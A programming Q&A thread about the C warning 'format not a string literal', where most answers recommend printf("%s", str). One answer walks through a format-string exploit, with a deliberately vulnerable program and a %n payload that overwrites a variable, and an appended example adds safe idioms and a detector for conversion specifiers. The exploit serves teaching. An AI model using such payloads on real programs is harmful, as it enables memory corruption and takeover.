c array - warning: format not a string literal

Backend | Unresolved | 6 | 1626
终归单人心 2020-12-25 09:45

I'm attempting to learn C and already I've run into an issue. I assume it's trivial but I need to know it. I have written:

#include
#include
6 answers
  • 2020-12-25 10:22

    Just to add something to the other answers: you'd better do this because a (long?) time ago people wrote printf like that and hackers found a way to read from and write to the stack, more here.
    For example, a simple program like this:

    blackbear@blackbear-laptop:~$ cat format_vul.c
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    
    int main(int argc, char *argv[])
    {
        char text[1024];
        static int test_var = -1;
    
        if(argc < 2) {
            printf("Use: %s <input>\n", argv[0]);
            exit(-1);
        }
    
        strcpy(text, argv[1]);
    
        printf("The correct way:\n");
        printf("%s", text);
    
        printf("\nThe wrong way:\n");
        printf(text);
    
        printf("\n[*]: test_var @ %8p = %d ( 0x%x )\n", &test_var, test_var, test_var);
    }
    blackbear@blackbear-laptop:~$ ./format_vul AAAA
    The correct way:
    AAAA
    The wrong way:
    AAAA
    [*]: test_var @ 0x804a024 = -1 ( 0xffffffff )
    

    Can be used to change test_var's value from 0xffffff to something else, like 0xaabbccdd:

    blackbear@blackbear-laptop:~$ ./format_vul $(printf "\x24\xa0\x04\x08JUNK\x2
    5\xa0\x04\x08JUNK\x26\xa0\x04\x08JUNK\x27\xa0\x04\x08").%8x.%8x.%8x.%8x.%8x.
    %8x.%8x.%8x.%8x.%110x.%n%239x%n%239x%n%239x%n
    The correct way:
    $�JUNK%�JUNK&�JUNK'�.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%8x.%110x.%n%239x%n%239
    x%n%239x%n
    The wrong way:
    $�JUNK%�JUNK&�JUNK'�.bfffefec.  154d7c.  155d7c.  155d7c.      f0.      f0.b
    ffff4a4.       4.       4.                                                  
                                                         174.                   
    
    
                                                    50415243                    
    
    
                                                   50415243                     
    
    
                                                  50415243
    [*]: test_var @ 0x804a024 = -1430532899 ( 0xaabbccdd )
    
    0 Discussion (0)
  • 2020-12-25 10:22

    printf() expects its format to be a string literal, not a dynamically created string. To fix, try this:

    printf("%s", str_a); // %s denotes a string
    

    Or use puts:

    puts(str_a);
    
    0 Discussion (0)
  • 2020-12-25 10:27

    The error is coming from printf(str_a);. Your code should be printf("%s", str_a);. Take a look at the following link for more info on printf: http://www.cprogramming.com/tutorial/printf-format-strings.html

    0 Discussion (0)
  • 2020-12-25 10:32

    The warning is caused by the compiler wanting the first argument of printf to be a string literal. It wants you to write this:

    printf("%s\n", str_a);
    

    This is because the first parameter of printf is the format string. The format arguments are then passed after that.

    Note: You can in fact use a variable as a format string, but you probably shouldn't do that. That's why the compiler issues a warning and not an error.

    0 Discussion (0)
  • 2020-12-25 10:33

    When using printf, the format string had better be a string literal and not a variable:

    printf("%s", str_a);
    
    0 Discussion (0)
  • 2020-12-25 10:48

    Please read the warning 'no format arguments' - i.e. no % in the string.

    Try printf("%s", str_a);

    0 Discussion (0)
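Added example, not from the question or any of the answers above: the `"%s"` idiom the answers recommend, written so the result can be checked against its input; the "no % in the string" check from the last answer, turned into a small detector for input that must never reach a format parameter; and a logging wrapper annotated so the compiler applies the same non-literal-format warning to callers of the wrapper that it applies to printf itself. The names render_untrusted, renders_verbatim, has_conversion and log_line are this example's own, and the sample input is constructed.

```c
/* Added example (not from the question or the answers above).
 * Assumed names: render_untrusted, renders_verbatim, has_conversion, log_line. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Correct idiom: the untrusted string is an ARGUMENT, never the format.
 * Returns the number of characters snprintf would write (excluding the NUL). */
static int render_untrusted(char *out, size_t out_len, const char *untrusted)
{
    return snprintf(out, out_len, "%s", untrusted);
}

/* Self-check: with the "%s" idiom every byte comes back unchanged, even when
 * the input contains conversion specifiers such as %x or %n. */
static int renders_verbatim(const char *s)
{
    char buf[256];
    return render_untrusted(buf, sizeof buf, s) == (int)strlen(s)
        && strcmp(buf, s) == 0;
}

/* Detection helper: does the string contain a '%' that printf would treat
 * as a conversion? "%%" is a literal percent sign and is not counted.
 * Useful for flagging or rejecting input in a log pipeline. */
static int has_conversion(const char *s)
{
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* "%%" is an escaped percent sign */
            p++;
            continue;
        }
        return 1;
    }
    return 0;
}

/* Logging wrapper. The format attribute (GCC/Clang extension) tells the
 * compiler that argument 3 is a printf-style format and argument 4 starts
 * the values, so log_line(buf, n, user_input) gets the same
 * "format not a string literal" warning as printf(user_input). */
#if defined(__GNUC__)
__attribute__((format(printf, 3, 4)))
#endif
static int log_line(char *out, size_t out_len, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(out, out_len, fmt, ap);
    va_end(ap);
    return n;
}

int main(void)
{
    /* Constructed sample input containing conversion specifiers. */
    const char *input = "AAAA.%8x.%n";
    char buf[64];

    render_untrusted(buf, sizeof buf, input);
    printf("rendered verbatim: %s\n", buf);
    printf("contains conversions: %d\n", has_conversion(input));

    log_line(buf, sizeof buf, "user said: %s", input);
    printf("%s\n", buf);

    /* log_line(buf, sizeof buf, input);   <- non-literal format: compiler warns */
    return 0;
}
```

Build with `gcc -Wall -Wformat -Wformat-security example.c`; uncommenting the last call in main reproduces the warning from the question, and `-Werror=format-security` turns it into a build failure so the pattern cannot reach production.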